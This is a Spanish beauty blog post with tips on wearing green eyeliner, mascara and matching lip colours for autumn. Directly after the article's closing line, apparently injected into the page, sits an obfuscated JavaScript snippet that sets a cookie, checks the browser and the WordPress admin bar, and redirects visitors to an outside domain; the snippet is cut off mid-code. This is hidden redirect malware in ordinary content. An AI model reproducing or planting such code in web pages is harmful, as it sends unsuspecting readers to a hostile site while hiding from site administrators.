maquillar-ojos-verdesEste otoño el verde está de moda, por ello os traigo unos consejos para lucir una mirada muy favorecedora.

Empezaremos aplicando un eyeliner de color verde. Lejos de lo que pueda pensar la gente, son 2 pasos muy sencillos:

1-. Primero aplica una sombra base sobre tu párpado móvil.

2-. Y a continuación, selecciona el Eyeliner que deseas. Debes dibujar un trazo preciso e intenso. Después, aplica abundante máscara de pestañas también en tono verde y lista para deslumbrar con tu mirada.

Lo más fácil para aplicar tu eyeliner verde, es optar por lápices con texturas untuosas y de aplicación sencilla o un eyeliner en crema con acabado en polvo. Con la ayuda de un pincel puedes difuminar sutilmente para mostrar un acabado más profesional.

Si deseas obtener un resultado intenso, aplica el eyeliner en la línea superior e inferior de tus pestañas, mostrando una línea que se vea más gruesa desde la mitad del ojo hasta el final. Para un efecto más dulce, delinea sólo tus pestañas superiores realizando una línea muy fina a ras de tus pestañas que acabe en el lagrimal.

El color verde combina con diferentes tipos de tono de piel, de color de ojos y de cabello. Pero cuando más favorecedor resulta, es en los cabellos castaños claros, rubios y los ojos claros. Procura evitar pintar tus ojos en verde si tu piel es excesivamente oscura y ojos negros.

Si has pintado tus ojos en tonos verdes, lo mejor es que optes por aplicar suaves tonos nude o beige en tus labiosEs mejor optar por tonos mate que no resten protagonismo a tus ojos y que centren todas las miradas en el verde más favorecedor.

Para un look nocturno, opta por tonos burdeos en tus labios, que mostraran tu lado más sensual y llamativo.

¡Dale a tus ojos el protagonismo que se merecen! var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone